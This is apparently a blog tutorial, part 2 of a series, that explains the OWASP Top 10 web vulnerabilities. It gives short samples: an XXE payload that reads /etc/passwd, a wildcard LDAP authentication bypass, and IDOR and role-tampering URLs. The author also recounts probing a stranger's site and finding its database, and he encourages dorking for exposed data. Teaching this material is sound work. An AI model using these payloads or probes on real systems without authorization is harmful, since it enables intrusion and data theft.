Open in app

Sign in

Write

Sign in

Using Burp Suite to exploit OWASP Top 10 — Part 2

Ahmad Moaaz
7 min readAug 22, 2020

Lets get into whats this OWASP Top 10 is all about!

For those who wants to go back to the Part 1 for the configuration of Burp and all, click here.

What is OWASP Top 10?

OWASP Top 10’s (Open Web Application Security Project) purpose is to aware the developers,managers,organizations or security experts about the uprising attacks in the cyber world. It gets updated every year depending on the rise of different trends of attacks being performed by attackers.

The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. — OWASP

Warning about using automated tools!

OWASP also has its own tool called ZAP (Zed Attack Proxy) which is great in finding vulnerabilities in a Web Application. It can be used for both, manual or automatic testing but i will strongly suggest not to use any automated tool specially if you are a n00b in Pentesting because you are going to miss out many things. You will get used to relying on automated tools which will make you a bad Pentester having no or little skills.

There are amazing automated tools out there which are widely used world wide but its best to use them when you know what actually happening behind the scenes, what payloads are getting sent to the application and on which parameters. Running the tools blindly can also sometimes crash the application or worse like if you are sending payloads to the application which is in production on a POST request which is directly going to the database, you might end up deleting all the existing data inside the database. So you should be careful while using these automated tools.

Portswigger’s official site also mentions it here.

Alright enough with the warnings, now lets get back to OWASP.

Many Pentesters or even organizations makes it compulsory for their Security Engineers to follow OWASP Top 10 guide while performing penetration testing so they do not miss out on anything.

Lets now discuss what does that “Top 10” means. The top 10’s are the most common and dangerous attacks launched on the sites by malicious attackers which includes:

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XEE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging and Monitoring

1) Injection

As the name says, this type of vulnerability occurs when a user is able to inject its own malicious payloads or commands which gets executed on the server-side. It refers to a broad class of attack vectors which takes advantage of user input and gets processed by an interpreter. These attacks are the oldest in the history of attacks and probably the most dangerous one’s because these attacks can result into DoS (Denial of Service), Data Theft or even full compromise of a web applications.

We are going to discuss few injection attacks including the famous SLQi, LDAP injection and OS command injection.

SQLi

This attack is a database specific attack and on successful exploitation, an attacker is able to dump the complete database of the target web site or sometimes even worse, can upload a web shell or execute commands on the server-side leading to full compromise of the application.

SQLI -Portswigger

This vulnerability occurs when an application trusts a user input blindly and does not put any sort of validation on the user provided input.

NEVER TRUST USER INPUT!!

Developers should always develop an application which never trusts user input. It should always be made in a way where application validates the user input fist before sending it to the server. That is how these applications get pwned!!

LDAP Injection

Same as SQLi, LDAP (Lightweight Directory Access Protocol) is also an attack which exploit a user input. In SQLi, malicious user input is put in an SQL statement to extract data and in LDAP, attacker takes advantages of LDAP search filters. Lets see with an example how this works.

Some of the examples of the filters:

  • (cn=Ahmad*) matches entries where the common name starts with Ahmad (* matches any character)
  • (!(cn=*Moaaz)) matches entries where the common name doesn’t end with moaaz (! is logical NOT)
  • (&(cn=A*)(cn=*Moaaz)) matches entries where the common name starts with A and ends with Moaaz (& is logical AND)

The applications which uses LDAP has these filters behind the input fields which if not sanitized, can result in compromise of the application

filter = "(&(userID=" + UsrName + ")(password=" + 
  UsrPwd + "))"

In the above code, if an attacker puts * in UsrName and UsrPwd then it could be possible to just login resulting in authentication bypass.

2) Broken Authentication

Broken authentication occurs when an application fails to protect its assets. These type of vulnerabilities lead to bypass of authentication mechanism. For example, some applications uses GET requests which leaks their session ids in the URL which goes by multiple means like routers, firewalls etc and gets saved their and if a malicious attacker gets hold of these firewall logs, he/she can takeover the victim’s account.

http://example.com/dir;jsessionid=2P0OC2JSNDLPSKHCJUN2JV

Another example would be no brute-force protection or no usage of password policy. Password policy is a must in order to be safe from dictionary attacks which includes 1000s of previously breached or common/easy passwords and it could be brute-forced if an application does not have rate limiting implemented on the endpoint.

3) Sensitive Data Exposure

Some applications does not protect its sensitive data from being exposed. Sometimes you will find it so easy to find passwords or even worse, application’s whole database!!

So recently i was just browsing one web-site and i have a habit of adding random directories at the end of the URL so i added /db and guess what? I saw a file named site.db which was the complete database of that application. These little things can lead to compromise of your whole application. This can include anything sensitive which the application is exposing ex: credit card number, admin username or passwords, transaction history, firewall logs, no TLS, unsalted hashes etc. If you want to see all these information, visit here and do some Google Dorking. You will be surprised!

4) XML External Entities (XEE)

XEE attack occurs when an application is processing its data in XML and using a vulnerable component for the process.

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT example ANY >
   <!ENTITY xxe SYSTEM  "file:///etc/passwd" >]>
<foo>&xxe;</foo>

An attacker can extract system files like etc/passwd as shown in the example n……………………………………..above. In worst case scenarios, it could also lead to RCE (Remote Code Execution) if the PHP applications accepts “expect” module.

5) Broken Access Control

Access Control was made to prevent users from accessing resources outside their intended area. Its a mechanism that controls who can access which resources or who can not.This vulnerability can cause an attacker to steal other user’s information or even accessing resources which belongs to other users.

http://example.com/dashboard?role=normalUser

If an attacker changes the normalUser to admin for example, he might be able to login into the dashboard of an admin and have privileges that only admin can have. When ever you are performing a Pentest, always remember to have a close look at the parameters and play with them. One of the most common vulnerability that falls under this category is IDOR (Insecure Direct Object Reference). This occurs when a user-supplied input fetches an object which belongs to another user. For example:

http://example.com/dashboard/ViewRemaingCash?id=12223

If an attacker changes the value of id to 12224, he would be able to see another user’s dashboard with details of his remaining cash.

6) Security Misconfiguration

Security Misconfiguration is one of the most common vulnerability. Many developers overlook these issues thinking it would not have any impact on its security, like leaving extra ports opened running outdated vulnerable software. Application showing verbose or exceptions on the web page etc.

7) Cross-site scripting (XSS)

Cross-site scripting is a client-side vulnerability which targets the clients of an application. XSS can be extremely dangerous and can be used to even deface a web application. Attackers can inject their malicious JavaScript into the web application or steal session cookies which leads to account takeover. According to OWASP, XSS can be found in almost two-thirds of all web applications. This vulnerability occurs when an application trusts user input without sanitizing it or escaping the user-input.

8) Insecure Deserialization

Before learning about Deserialization, we need to know what serialization is. Serialization basically takes an object from an application and converts it to another format. Deserialization is the opposite, it takes that serialized object and converts it back in a format that application can understand.

In an insecure deserialization, those objects which are serialized can be altered or tampered which could lead to Remote Code Execution (RCE) attacks which is one of the most dangerous attacks.

9) Using components with known vulnerabilities

This vulnerability refers to applications using libraries, modules or frameworks which already have publicly known vulnerabilities which an attacker can exploit by finding publicly available exploits.

For example, a lot of site which are using an older version of WordPress are prone to multiple attacks which can be exploited by an attacker just because components with known vulnerabilities are being used and the developer or the site owner did not updated.

10) Insufficient logging and monitoring

According the IBM, an average company takes about 197 days to identify an attack and 69 days to contain a breach. This shows that an attacker remains hidden or undetected and can cause more damage.

This happens because a lot of applications overlooks on logging and monitoring of the security incidents. There should be proper logging of every single thing or click that happens on the site and timely actions should be taken upon noticing any traffic or anything suspicious.

So we have covered what OWASP Top 10 is and now in the next post, i will show you how to exploit each and every vulnerability in details.

--

--

Ahmad Moaaz

Written by Ahmad Moaaz

26 Followers

A Security Engineer/Penetration Tester who likes breaking into applications

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams